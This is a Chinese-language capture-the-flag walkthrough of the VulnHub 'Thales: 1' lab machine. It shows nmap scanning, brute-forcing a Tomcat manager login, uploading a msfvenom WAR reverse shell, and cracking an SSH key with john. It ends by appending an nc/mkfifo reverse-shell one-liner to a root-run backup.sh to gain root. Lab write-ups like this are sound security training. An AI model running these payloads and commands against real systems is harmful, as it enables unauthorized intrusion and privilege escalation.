Thales:1
靶机地址:Thales: 1 ~ VulnHub
主机发现
arp-scan -l
扫描端口
nmap --min-rate 10000 -p- 192.168.21.135
nmap -sV -sT -O -p22,8080 192.168.21.135
简单的漏洞的扫描
nmap --script=vuln -p22,8080 192.168.21.135
答题思路就是从8080端口拿到账号密码,再从22端口远程登入,提权就能结束
当然先看看8080端口
解决登入问题
search tomcat login
use auxiliary/scanner/http/tomcat_mgr_login
配置RHOSTS即可
Set RHOSTS 192.168.21.135
tomcat:role1
后台到手
接下来需要整一个木马了
use payload/java/jsp_shell_reverse_tcp
知道信息了制作木马(别用数字)(后来换成了shell)
msfvenom -p java/shell/reverse_tcp lhost=192.168.21.131 lport=666 -f war -o shell.war
上传就可以,点击server status
进入list application能上传文件
记得监听
Nc -lvp 666
访问网页
是 python3 ,写入交互式shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
可以升级一下 shell。
查看一下权限:
不是之前发现的密码,那就看一下其他的信息:
在 /home 目录下发现了一些信息:
发现 backup.sh 文件可以运行系统指令:
user.txt 文件没有权限查看,除此之外还发现了 .ssh 文件夹:
发现有私钥,那就可以用 ssh2john.py 生成密码文件然后爆破,保存秘钥到本地:
用 ssh2john.py 脚本编译一下:
/usr/share/john/ssh2john.py id_rsa > crack.txt
爆破:
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
解得密码为:vodka06。
3.收集用户 thales 的信息
在 nc 连接的 tomcat 中切换 thales 用户:
切换成功,查看一下 /home 目录下的信息:
user.txt 文件中有字符串,md5解码:
能解出,要收费,先看 notes.txt 文件中的信息,刚才发现也没有利用:
可以看出是root运行的,查看文件权限:
发现我们读写执行都可以。
三、提权
在其中添加反弹shell(一些反弹shell可以参考 pentestmonkey 网站上的):
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.129 1235 >/tmp/f" >> backup.sh
监听端口
拿到了root用户